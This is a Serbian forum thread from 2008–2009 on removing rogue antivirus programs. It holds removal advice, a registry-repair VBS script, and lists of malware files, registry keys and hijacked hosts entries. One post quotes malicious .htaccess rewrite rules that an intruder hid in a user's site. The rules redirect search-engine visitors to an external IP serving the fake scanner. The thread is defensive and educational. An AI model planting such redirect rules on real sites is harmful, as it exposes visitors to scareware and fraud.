Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne

[es] :: Zaštita :: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne

Strane: < .. 1 2 3 4 5

[ Pregleda: 34267 | Odgovora: 82 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

dimnicar
dimnicar

Član broj: 48094
Poruke: 475
*.eunet.yu.



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne22.12.2008. u 11:18 - pre 2130 dana i 17h

Sto se tice antivirusa 2009 ne slazem se sa onima koji kazu da mora da se pritisne yes da bi se instalirao.
Cak i ako ga kanselises on pocinje da skenira,govoreci pri tom da je zarazen ceo komp i da sve treba brisati.Evo mene je ovih dana upravo napao.,ali mu uspesno odolevam.
u kasperskom sam chekirao enable file antivirus i web antivirus stavio ih na maximum,anti pishing i antidiler su mi takodje enabled,i za sada se dosadni skot ne pojavljuje. Taj skot se ne mora aktivirati sa "YES,YES,YES" dugmetom. Dovoljno je da ti neko postavi link "koji te vodi ka necemu sto ti trazis",a u stvarnosti te odvede do linka antivirus 2009,Mozes i da mu stisnes dugme NO,ili da ga kenselise Gospodin SKOT pocinje da skenira.Ako se to desi ,diskonnektuj se i restartuj sistem da zeznes skota,a zatim probaj da cekiras u kasperskom ona polja enable...... Eto mene skot za sada vise ne uznemirava.
 
Odgovor na temu

cyberdjomla
Cyber Djomla
Tahografista, serviser racunara
Beograd

Član broj: 189677
Poruke: 44
*.adsl-4.sezampro.yu.



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne16.01.2009. u 03:58 - pre 2106 dana
Koliko sam ja mogao da primetim na ovom forumu se pojavljuju poruke tipa: 1."Kad to vidis restartuj...", 2."Falio mi je NTLDR..." i sa njim verovatno i Boot.ini kao i Ntdetect.com, 3."Najbolje je resenje da formatiras...", 4."Instaliraj... to to to to to i to pa i jos to...", 5."Probaj ovaj rootkit, probaj onaj ...".
JBT. ljudi ima li ovde nekoga ko nije laik za racunare sem dvojice (mislim) koji su Vam dali najpametnije savete do sad.

Jednostavno:
1.Nemas potrebe da restartujes racunar ako ti je iskocio neki takav smesan prozor. Zatvori page. Danas svi browser-i imaju tabed fazon i lepo kliknes na X.

2.Falio ti je fajl ??? NTLDR ? Ajmo... to moras da formatiras pa ti se brise sve sto ti je bilo na desktop-u npr. pa ti brise sve lepo instalirane programe i podesene, pa iz My Documents takodje se sve brise jer kod 99,99% korisnika MyDoc's stoji na "c:\Docume~1\korisnik\My Documents" i tu skladiste svoje podatke. GLUPOST!!! Jesi li cuo za Hiren'sBootCD ? Ili za XP Setup CD ? Ili jednostavno neki (bilo koji) linux. BILO STA STO MOZE DA SE BOOTA I STO MOZE DA TI "GLEDA" U DRAJVOVE MOZE DA TI RESI PROBLEM ZA DESET MINUTA. U to budi uveren.

3.FORMATIRANJE NIJE NAJBOLjE RESENJE. (Osim u slucajevima gde je to neophodno, u ovom slucaju SIGURNO nije) Par poteza ili tacnije par desetina poteza i racunar ti je nov. Treba samo upregnuti vijugu.

4.Instaliranje svih tih cudesa dodatno usporava racunar. Zasto? Evo... Svaki od tih antivirusa itd. programa ima svoj "kernel" koji se ucitava pri boot-u i ima svoj "ControlCenter" koji se startuje pri login-u usera. Svaki od njih zauzima po "neki" procenat procesora ram-a, ovoga, onoga... i takvo usporenje se da primetiti. Naravno sad ce mnogi reci: "Meni komp radi isto...", "Ja imam core2qad :) bla bla truc..." i jos neke budalastine, ali oni ne znaju da postoji jos korisnika sa dosta slabijim konfiguracijama a kod takvih se bogami oseti. Naravno ovi isti, pretpostavljam laici ce reci: "Pa zasto ne kupe bolji...". Glupost. Da ne skrecem sa teme.

5.Kazu: "Proba se ne placa" ali se zato nekad i opeces. Licno meni rootkit RootkitRevealer napravio problem, dok sam npr. njega koristio na bezbroj mesta i odradjivao posao. Nemam nista protiv rootkita. Korisne su to alatke. Samo treba obratit paznju sta koristiti i ODAKLE GA SKIDATE.


1. Sto se tice prvog. Mozes da iskljucis page na x i nemas brige sve dok je neko ne nadje u history. Dakle posle toga obrisi history.

2. Spomenuo sam "BILO STA STO MOZE DA BOOTA...". Da. Kako povratiti ntldr?
a. Hiren'sBootCD.
Startuj dos iz njega i prebaci fajl na c:\. Mozes ga naci u "C:\WINDOWS\ServicePackFiles\i386" ako imate instaliran service pack, ili ga prekopirati sa necijeg racunara, dakle fles. Fles mora biti na usb portu pri bootu cd-a.
b. XP Setup CD.
Ubacite setup disk i kad vas lepo pita da li zelite da instalirate svezu kopiju win-a ili da ukljucite recovery konzolu vi odaberite drugo. Dakle pritisnete R i otvara Vam se RecoveryConsole, vidi se kao DOS... ajd. Pitace Vas u koji Win zelite da se ulogujete. Verovatno ce biti samo jedan tako da pritisnete 1 i enter. Unesite password ako je potreban, ako ne samo Enter i pocnite sa vracanjem podataka.
Pretpostavljam da cete do tad nauciti osnovne komande u dos-u.
fajl NTLDR se nalazi u "CD-Rom:\I386" gde je CD-Rom "Slovo" koje ga predstavlja. Uzecemo da je to "E:\".
Kucamo sledece: copy "E:\I386\ntldr" "C:\ntldr" Ista stvar i za ntdetect.com jer i njega virusi brisu u paketu sa ntldr.
c. Bilo koji Linux. Verujte mi, ovo je igra za malu decu. Ovde cak i ne moras da kucas copy... vec sve radis desni klik pa copy kao i u Win-u. Ovo ne zelim da Vam objasnjavam. Bilo bi jako nisko. A zeljene fajlove cete naci na vec pomenutim lokacijama.

3. Ako ne mozes otvoriti regedit to je razlog sledeceg (ovo vazi i za task manager):
a. Virus je sebe postavio za regedit-ov debugger.
b. Virus je zabranio pristup regedit-u.
c. Virus je obrisao regedit. Moze se vratiti iz foldera "C:\WINDOWS\ServicePackFiles\i386", "%systemroot%\system32\dllcache" ili sa setupCD u folderu "..\I386\regedit.exe" kao i sa flesa. Postoji milion kombinacija za to.
Sledeca VBS skripta Vam moze MNOOGOOO pomoci.

''''''''''''''''''''''''''''''''''''''''''''''''
On Error Resume Next
Set Skripta = WScript.CreateObject("WScript.Shell")

'Brisanje zabrane za task manager iz Policies:
Skripta.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"

'Brisanje zabrane za regedit iz policies:
Skripta.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"

'Brisanje debuggera za oba:
Skripta.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger"
Skripta.RegDelete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\debugger"

'Pokrece TaskMgr i Regedit
Skripta.run "taskmgr.exe"
Skripta.run "regedit.exe"
''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Otvorite Notepad i prekopirajte gornji text a zatim sacuvajte kao VBS. Kako? File, Save As, zatim u nazivu stavite "skripta.vbs" a dole u Save As Type neka bude "All Files", save. Posle starta vbs fajla pokrenuce Vam se i taskmanager i regedit

Kad Vam se startuje regedit mozete da pretrazujete po njemu. Sta? Sve veze koje postoje sa doticnim "Skotom". Kako?
Preporucujem da skinete ProcesExplorer jer Vam on omogucuje da vidite iz kog fajla se izvrsava nezeljeni proces kao i njegov ImageName koji cete koristiti u pretrazi kroz registre. Mozete ga skinuti sa www.sysinternals.com iliti http://www.microsoft.com/technet/sysinternals sto mu dodje isto. Prvi je redirektovan na drugi. :)
Dakle, u ProcesExplorer-u vidite sta Vam smeta i krenite u potragu. Najbolje da zapisete ImageName tih virusa pa da ih odmah iskljucite iz procesa i naravno obrisite fajl (Ime fajla se vidi po zadrzavanju misa iznad zeljenog procesa ili desni klik properties). Dalje, gde god da nadjete njegov ImageName (u registrima) brisite ga ali pre toga napravite backup tog kljuca u kome se nalaze i ostale informacije verovatno bitne za Vas racunar kako bi u slucaju neke greske mogli da vratite na svoje mesto.

ZNAM DA VAS SMARAM ALI ISPLATICE VAM SE !!!

Bitno je takodje da nadjete veze koje mogu biti oblika npr. {6e93bcf0-aa4a-11dc-b23d-001d60027d3c} pa pretraziti registre sa takvim oblikom i obrisati. Napraviti backup.
Ovo Vam moze posluziti kao zlatni tutorial za sve buduce ne daj boze viruse.

4. Necu da komentarisem. Savet je izmedju redova.
5. To je Vasa stvar. Rootkit pomaze ali u ovom slucaju nije potreban.

Molim sve Vas da obratite paznju na ovo. Ako ko opet ima problema neka se javi ovde ili neka salje mail na cyberdjomla@gmail.com. Vrlo rado cu pomoci. Jos jedna mogucnost:
TeamViewer je zlatan programcic za remote desktop. Ako ko zeli mogu i preko njega da ja sam otklonim problem.
Sto se placanja tice... :) :) Sala. Popij koje pivo za mene ili sta vec. Nadam se da Vas nisam udavio ovolikim textom a siguran sam da je od pomoci. Hvala! Pozdrav svima!!!

[Ovu poruku je menjao cyberdjomla dana 16.01.2009. u 13:14 GMT+1]
CyberDjomla
 
Odgovor na temu

wux
NS

Član broj: 27480
Poruke: 161
*.dynamic.sbb.rs.



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne16.01.2009. u 23:34 - pre 2105 dana i 4h
Laptopovi

Evo iskustva sa prijateljicinim laptop-om:

Antivirus2009 nije dozvoljavao instaliranje bilo čega što može da ga ukloni, a ono što je puštao nije uspevalo da ga detektuje.
Probao sam na foru i uspelo je: promenio sam ime setup fajla Malwarebytes' Anti-Malware u xxx.exe i instalacija je prošla, ali nije hteo da ga startuje. Onda sam promenio i ime izvršnog fajla i uspeo je da se pokrene i ukloni napast...
Nakon istalacije Avast Free pustio sam ga da uradi boot time (ili kako se već zove) i našao je još neke zaostatke u restore fajlovima, a mislim da ću instalirati još nekoliko AV u trial modu i proveriti za svaki slučaj...
 
Odgovor na temu

cyberdjomla
Cyber Djomla
Tahografista, serviser racunara
Beograd

Član broj: 189677
Poruke: 44
*.adsl-a-1.sezampro.yu.



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne17.01.2009. u 01:35 - pre 2105 dana i 2h
Virus je sebe postavio za AntiMalware-ov debugger.
Uradi ono sa skriptom gore samo promeni regedit.exe u ime tog fajla sto nece da se pokrene. Radice sigurno.
Javi sta je bilo. Pozz.
CyberDjomla
 
Odgovor na temu

cyberdjomla
Cyber Djomla
Tahografista, serviser racunara
Beograd

Član broj: 189677
Poruke: 44
*.adsl-a-1.sezampro.yu.



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne18.01.2009. u 06:22 - pre 2103 dana i 22h
Posto ga nema u temama, ajd. da ga ubacimo.
Antivitus 2010 je slican svojim prethodnicima Antivirus 2009 i 2008. Izbacuje porukicu, pa kao nesto skenira, pa se ti uplasis pa kliknes na "Scan Now" pa ti on prebaci neki fajlic, pa ti to pokrenes pa te onda davi i nemas zivaca zato sto te udavi nekim porukama kako imas neki spyware i neko jos cudo...







Poruka surferima: "ISKULIRAJTE STRANICU", zatvorite je i obrisite je iz history da se nebi neko zeznuo pa je "Slucajno" pokrenuo sa vaseg kompa.
Updatujte svoje antiviruse firewall-ove itd.


Svoje fajlove smesta u Program Files "AV2010\AV2010.exe" i "AV2010\svchost.exe" a u system32 stvara "wingamma.exe", "IEDefender.dll" i "wingamma.exe"
Postavlja precice na "desktop" i u "start menu"


Upisuje registre u (oni koje sam nasao):

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Gamma Display"
HKEY_CLASSES_ROOT\Interface\{7BC7565C-5062-43CE-8797-DC2C271140A9}
HKEY_CLASSES_ROOT\TypeLib\{705FD64B-2B7B-4856-9337-44CA1DA86849}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
HKEY_CLASSES_ROOT\AppID\IEDefender.DLL
HKEY_CLASSES_ROOT\AppID\{3C40236D-990B-443C-90E8-B1C07BCD4A68}
HKEY_CLASSES_ROOT\CLSID\{FC8A493F-D236-4653-9A03-2BF4FD94F643}
HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO
HKEY_CLASSES_ROOT\IEDefender.IEDefenderBHO.1

Moguce da sam nesto izostavio.

ZDRAVO!




[Ovu poruku je menjao cyberdjomla dana 18.01.2009. u 08:29 GMT+1]
CyberDjomla
 
Odgovor na temu

m.alexandar
Pozarevac

Član broj: 71577
Poruke: 23
89.216.28.*



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne19.01.2009. u 07:22 - pre 2102 dana i 21h
Citat:
dimnicar: Sto se tice antivirusa 2009 ne slazem se sa onima koji kazu da mora da se pritisne yes da bi se instalirao.
Cak i ako ga kanselises on pocinje da skenira,govoreci pri tom da je zarazen ceo komp i da sve treba brisati.Evo mene je ovih dana upravo napao.,ali mu uspesno odolevam.
u kasperskom sam chekirao enable file antivirus i web antivirus stavio ih na maximum,anti pishing i antidiler su mi takodje enabled,i za sada se dosadni skot ne pojavljuje. Taj skot se ne mora aktivirati sa "YES,YES,YES" dugmetom. Dovoljno je da ti neko postavi link "koji te vodi ka necemu sto ti trazis",a u stvarnosti te odvede do linka antivirus 2009,Mozes i da mu stisnes dugme NO,ili da ga kenselise Gospodin SKOT pocinje da skenira.Ako se to desi ,diskonnektuj se i restartuj sistem da zeznes skota,a zatim probaj da cekiras u kasperskom ona polja enable...... Eto mene skot za sada vise ne uznemirava.



za sve ostalo tu je alt + f4

 
Odgovor na temu

colja29
Slobodan Popov
Muzičar
Zrenjanin

Član broj: 47612
Poruke: 16
*.beotel.net.

ICQ: 270186274
Sajt: www.sms-poruke.dzaba.com


Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne27.01.2009. u 11:24 - pre 2094 dana i 17h
Naj-jednostavniji nacin da se oslobodite tih napasti je free program http://siri.urz.free.fr/Fix/SmitfraudFix.exe SmitfraudFix opsirnije o programu http://siri.urz.free.fr/Fix/SmitfraudFix.php ovde
Vrlo jednostavan program,mora se pokrenuti iz safe moda !
Mene je nekoliko puta spasao ponovne instalacije Windowsa

A pisano je o tome i u temi http://www.elitesecurity.org/t306716-0
colja29

http://www.altstudiozr.com/ (Muzički Studio)
http://www.www.ns-wellness.com ( Masaža, Djakuzi, Solarijum)
http://www.sms-poruke.dzaba.com/
 
Odgovor na temu

Miroslav-BL
Miroslav Peric
Banja Luka

Član broj: 80259
Poruke: 105
*.teol.net.



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne28.01.2009. u 13:48 - pre 2093 dana i 14h
Pre tri dana sam imao problem sa Antivirus 2010.

Nakon brisanja raznih gluposti sa racunara pomocu programa CCleaner, zatim skeniranjem uz pomoc KIS 2009 i SpyBot, nakon 3-4 puta nije se vise pojavljivao. Sva tri programa su bili poslednje verzije.

Verujem da je ovo resilo problem.
Sve ce to mila moja prekriti ruzmarin, snjegovi i šaš!
 
Odgovor na temu

stevicad
Stevica Damjanovic
C&I Eng, KPO b.v.
Kazahstan

Član broj: 140975
Poruke: 21
82.112.6.*



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne07.02.2009. u 12:36 - pre 2083 dana i 15h
Licno imam problema vezano za ovaj lazni antivirus, ali sa druge strane...

Kada sam slucajno potrazio adresu drugara ,preko google-a, (kojem inace "ustupam" deo svog hostinga) naravno pojavi se i meni taj cuveni "Antivirus" kao pop-up....dalje je sve jasno.

E sad uzrok je to sto se u .htaccess fajl koje se obicno nalazi na istom mestu na serveru gde i Index.html promenjen, i to tako da tek kada ga otvorim (text) i skrolujem poprilicno "dole" (posto je na prvi pogled dokument prazan...)neko ubacio maliciozni kod sledece sadrzine:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87 .248.180.90/in.html?s=ipw2 [R,L]


Ja sam do sada vec nekoliko puta promenio (obrisao) ovaj kod, ostavljajuci prazan .htaccess dokument, promenuo svoju FTP sifru, nakon cega je jedno vreme sve ali sledece jutro opet stari kod....i redirekcija na "skeniranje" racunara....

Trenutno je ok, ali videcu ujutu...
SD
 
Odgovor na temu

Nemanja Živanović

Član broj: 212716
Poruke: 459



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne17.03.2009. u 15:10 - pre 2045 dana i 13h
Anti-virus-1 je relativno novi Rouge Antivirus program (lazni antivirus) slican programima kao sto su Antivirus 2010. i Antivirus 360.




================================
Uklanja se sa Malwarebytes` Antimalware.
================================



U HijackThis logu pojavljuju se sledeci fajlovi:

Citat:
O1 - Hosts: 217.20.175.74 www.review.2009softwarereviews.com
O1 - Hosts: 217.20.175.74 review.2009softwarereviews.com
O1 - Hosts: 217.20.175.74 a1.review.zdnet.com
O1 - Hosts: 217.20.175.74 www.d1.reviews.cnet.com
O1 - Hosts: 217.20.175.74 www.reviews.toptenreviews.com
O1 - Hosts: 217.20.175.74 reviews.toptenreviews.com
O1 - Hosts: 217.20.175.74 www.reviews.download.com
O1 - Hosts: 217.20.175.74 reviews.download.com
O1 - Hosts: 217.20.175.74 www.reviews.pcadvisor.c.uk
O1 - Hosts: 217.20.175.74 reviews.pcadvisor.co.uk
O1 - Hosts: 217.20.175.74 www.reviews.pcmag.com
O1 - Hosts: 217.20.175.74 reviews.pcmag.com
O1 - Hosts: 217.20.175.74 www.reviews.pcpro.co.uk
O1 - Hosts: 217.20.175.74 reviews.pcpro.co.uk
O1 - Hosts: 217.20.175.74 www.reviews.reevoo.com
O1 - Hosts: 217.20.175.74 reviews.reevoo.com
O1 - Hosts: 217.20.175.74 www.reviews.riverstreams.co.uk
O1 - Hosts: 217.20.175.74 reviews.riverstreams.co.uk
O1 - Hosts: 217.20.175.74 www.reviews.techradar.com
O1 - Hosts: 217.20.175.74 reviews.techradar.com
O2 - BHO: QWProtectBHO - {70FEAD04-A7FD-4B89-B814-8A8251C90EF7} - C:\Documents and Settings\All Users\Application Data\AV1\QWProtect.dll
O4 - HKLM\..\Run: [Monitor calibration] C:\Documents and Settings\All Users\Application Data\AV1\AV1i.exe


Na racunaru se pojavljuju sledeci fajlovi:

Citat:
c:\Documents and Settings\All Users\Application Data\AV1
c:\Documents and Settings\All Users\Start Menu\Programs\Anti-virus-1
c:\Documents and Settings\All Users\Application Data\AV1\AV1.cab
c:\Documents and Settings\All Users\Application Data\AV1\av1.exe
c:\Documents and Settings\All Users\Application Data\AV1\AV1i.exe
c:\Documents and Settings\All Users\Application Data\AV1\AV1i2.exe
c:\Documents and Settings\All Users\Application Data\AV1\QWProtect.dll
c:\Documents and Settings\All Users\Application Data\AV1\svchost.exe
c:\Documents and Settings\All Users\Desktop\Anti-virus-1.lnk
c:\Documents and Settings\All Users\Start Menu\Programs\Anti-virus-1\Anti-virus-1.lnk
c:\Documents and Settings\All Users\Start Menu\Programs\Anti-virus-1\Uninstall.lnk


U Registry bazu upisuju se sledeci kljucevi:

Citat:
HKEY_CURRENT_USER\Software\AV1
HKEY_CURRENT_USER\Software\AV1\AV1\{F275E931-AFEC-4f70-B0D4-CC2731B945E0}
HKEY_CLASSES_ROOT\AppID\{29256442-2C14-48CA-B756-3EE0F8BDC774}
HKEY_CLASSES_ROOT\AppID\QWProtect.DLL
HKEY_CLASSES_ROOT\CLSID\{70FEAD04-A7FD-4B89-B814-8A8251C90EF7}
HKEY_CLASSES_ROOT\Interface\{051C9A06-FB08-486F-B09B-8B33B261637D}
HKEY_CLASSES_ROOT\QWProtect.QWProtectBHO
HKEY_CLASSES_ROOT\TypeLib\{512E801E-2F02-4ADE-ACAA-58F08A22B2F8}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{70FEAD04-A7FD-4B89-B814-8A8251C90EF7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Monitor calibration"


Posle uklanjanja ovog Rouge-a sa MBAM-om, obavezno pogledajte da li su navedeni fajlovi ili regisry kljucevi slucajno ostali na racunaru.

[Ovu poruku je menjao Nemanja Živanović dana 31.03.2009. u 12:41 GMT+1]
Prikačeni fajlovi
 
Odgovor na temu

Nemanja Živanović

Član broj: 212716
Poruke: 459



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne17.03.2009. u 15:25 - pre 2045 dana i 13h
Spisak novih Rouge programa:

ANG AntiVirus 09
Virus Remover 2009
WinCleaner 2009
PrivacyGuardPro
Total Virus Protection





Svi navedeni Rouge programi uklanjaju se sa Malwarebytes` Antimalware. Zahvaljujem se sajtu www.bleepingcomputer.com na korisnim informacijama.
Prikačeni fajlovi
 
Odgovor na temu

Nemanja Živanović

Član broj: 212716
Poruke: 459



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne22.03.2009. u 17:16 - pre 2040 dana i 11h
Upustvo za uklanjanje Rouge programa alatom SmitFraudfix:

• Preuzmite SmitFraudfix na Desktop
• Restartujte racunar u Safe Mode
• Pokrenite program SmitFraudfix duplim klikom na ikonicu
• Pokrece se ekran Credits (pritisnite bilo koje dugme da nastavite)
• Sada se otvara izbor gde cete pritisnuti 2 (to ce oznaciti da proces ciscenja pocinje)
• Program ce poceti da cisti racunar kroz nekolio faza i kada zavrsi pokrenuce se Disk Cleanup program (da ocisti Temp, Temporary Internet Files...)
• Kad se ovaj proces zavrsi pojavice se ekran gde cete biti upitani: Do you want to clean the registry ? (y/n) - tu pritisnite Y pa Enter
• Kada se ovi procesi zavrse pojavice se crveni ekran sa porukom Computer will reboot now. Close all applications i pritisnute spacebar (razmaklicu na tastaturi) da potvrdte
• Racunar ce se tada restartovati u normalan rezim rada i automatski ce se pojaviti Notepad sa izvestajem.
 
Odgovor na temu

Nemanja Živanović

Član broj: 212716
Poruke: 459



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne30.03.2009. u 23:30 - pre 2032 dana i 5h
Upustvo za uklanjanje "System Security" Rouge Antivirusa

Imao sam malo slobodnog vremena pa sam napravio video upustvo za uklanjanje System Security Rouge antivirusa. U principu, ovo upustvo vazi za uklanjanje vecine Rouge softvera:



Preuzimanje alata prikazanih u video tutorijalu:
SmitFraudFix
HijackThis

Bilo bi pozeljno da posle ovakvog uklanjanja racunar skenirate sa programom Malwarebytes` Antimalware. Sve nedoumice, pitanja i analizu loga mozete postaviti na forumu, otvaranjem nove teme.
 
Odgovor na temu

Boban1961
Obrad Maćej
Ne zaposlen
Pančevo, Srbija

Član broj: 221524
Poruke: 8
91.150.96.*



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne12.05.2009. u 09:45 - pre 1989 dana i 19h
Najveći je problem panika!!!
Jer se svi uspaniče kad ga zakače AV 360
Simulira pad sistema to jest plavljenje ekrana
na kom piše belim slovima:
Kompjuter je restartovao- pao pre negon što se naka komponenta ošteti!
Ali je to samo čuvar ekrana, nije ni u ludilu plavljenje ekrana tj. pad sistema!

On ide u više relacija u Sistem 32 u Program Files, Documents and Setings Aplikacije
u My Documents i na C:
Ako nemaš 2 OS instalirana
Restartuješ komp
Ubaciš bootabilan Partition Magic
Napraviš još jednu sistemsku particiju 10 GB
Restartuješ računar.
Ubaciš Bootabilan CD XP i instalirašna tu pripremljenu particiju
instaliraš Driver za grafičku i podršku za matičnu...
Kad si to uradio možeš da pređeš na stvar
Ideš na opciju pretraži na C: particiji i AV 360 i kučence ili Merlin će da pronađu sve gde se instalirao!!!
Imaćeš uvek jedan rezervni operativni sistem za takve slučajeve

PS. Prilikom instalacije odaberi ćirični widows na svim nivoima ako obraćuješ titlove
filmova da bi mogao da sačuvaš ćirilicu kao ANSI 8-o bitni text jer samo 8-o bitni text čitaju DivX player-i

Ja uvek imam 3 Operativna sistema
1. Win XP Latinični SP2 ili 3
2.Win XP Ćirilica SP2 ili 3
3.Win XP bez servis packa
jer jedino njegov Explrer vidi prazan DVD
4.LINUX


Ja sam Sluga Božiji, Isusa Hrista i Duha Svetoga, Heruvima, Serafima Anđela i svih Svetih...
 
Odgovor na temu

Jagnjeca brigada

Član broj: 52969
Poruke: 310
67.159.44.*



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne05.10.2009. u 12:31 - pre 1843 dana i 16h
Meni se javio lazni Antivirus 2010, i ako sam imao "NOD32 v 2.7" updejtovan sa najnovijim definicijama i jos pride "AdMuncher" naravno bio IE7. Problem sam resio samo samo sa System Restore, to je bilo pre tri dana i jos se nije povratio.

[Ovu poruku je menjao Jagnjeca brigada dana 05.10.2009. u 14:06 GMT+1]
"Nikad ne raspravljaj sa budalom: Prvo ce da te spusti na svoj nivo, a onda ce da te
dobije na iskustvo!"
 
Odgovor na temu

Zoran Rodic
Beograd

Član broj: 57538
Poruke: 3215
93.86.14.*

Sajt: zoranrodic.in.rs


Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne05.10.2009. u 12:39 - pre 1843 dana i 16h
ZAista ne razumem poriv da neko koristi v2,7

To je isto kao da nemaš antivirus na računaru.
Bolje stavi besplatnu Aviru
Lomografija je kad imaš sa čime, a nećeš … a Pinhole kad nemaš sa čime, a hoćeš! tm

 
Odgovor na temu

Jagnjeca brigada

Član broj: 52969
Poruke: 310
67.159.44.*



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne05.10.2009. u 13:13 - pre 1843 dana i 16h
Nisam imao problema sa virusima godinama, 2.7 koristim jer ne opterecuje racunar (stariji racunar je u pitanju). Ne znam kako nije detektovao ovaj lazni virus, verovatno jer prepoznaje samo prave viruse :)



"Nikad ne raspravljaj sa budalom: Prvo ce da te spusti na svoj nivo, a onda ce da te
dobije na iskustvo!"
 
Odgovor na temu

reb0rn

Član broj: 31289
Poruke: 205
93.86.3.*



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne05.10.2009. u 13:34 - pre 1843 dana i 15h
Politika svake AV kompanije je da stare verzije totalno zapostave i nateraju korisnike da plate i predju na nove verzije jer inace kako bi im uzeli kes.. tako da NOD 2.7 trenutno skoro nista ne radi po pitanju novih napasti..
 
Odgovor na temu

Zoran Rodic
Beograd

Član broj: 57538
Poruke: 3215
93.86.14.*

Sajt: zoranrodic.in.rs


Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne05.10.2009. u 13:50 - pre 1843 dana i 15h
Ok, da ne idemo u off topic .... preusmerio bih dalju diskuju na sledecu temu
http://www.elitesecurity.org/t...eba-ili-razbacivanje-resursima
Lomografija je kad imaš sa čime, a nećeš … a Pinhole kad nemaš sa čime, a hoćeš! tm

 
Odgovor na temu

Jagnjeca brigada

Član broj: 52969
Poruke: 310
93.87.96.*



Profil

icon Re: Kako ukloniti: Sysinternals Antivirus, Antivirus 360, Antivirus XP 2008, XP Protector 2009 i slicne25.10.2009. u 11:51 - pre 1823 dana i 16h
Evo sta kaze Microsoft za lazni antivirs:

Important note about fake antivirus
Reports of rogue antivirus programs have become more prevalent lately. These are programs that generate misleading alerts and false detections of malcode in order to convince users to purchase the illegitimate security software. For example, programs such as Trojan:Win32/Antivirusxp and Program:Win32/FakeRednefed may display product names or logos in an apparent unlawful attempt to impersonate Microsoft products. These products may represent themselves as "Antivirus XP", "AntivirusXP 2008", "WinDefender 2008", "XP Antivirus", etc.
If you believe your machine is affected by malicious software or potentially unwanted software, you can use Windows Live safety scanner or another up-to-date scanning and removal tool to detect and remove malware or other potentially unwanted software from your computer. For more information on Microsoft security products, please visit our security products and services website. Additionally, you can get virus-related assistance at no additional charge from Microsoft in the United States and Canada via a toll-free support hot line, (866) PC-SAFETY (727-2338). For support outside the United States and Canada, please contact Microsoft Help and Support worldwide.

http://www.microsoft.com/windo...infamily/defender/default.mspx


oni preporucuju ovo:

http://onecare.live.com/site/en-us/default.htm
"Nikad ne raspravljaj sa budalom: Prvo ce da te spusti na svoj nivo, a onda ce da te
dobije na iskustvo!"
 
Odgovor na temu

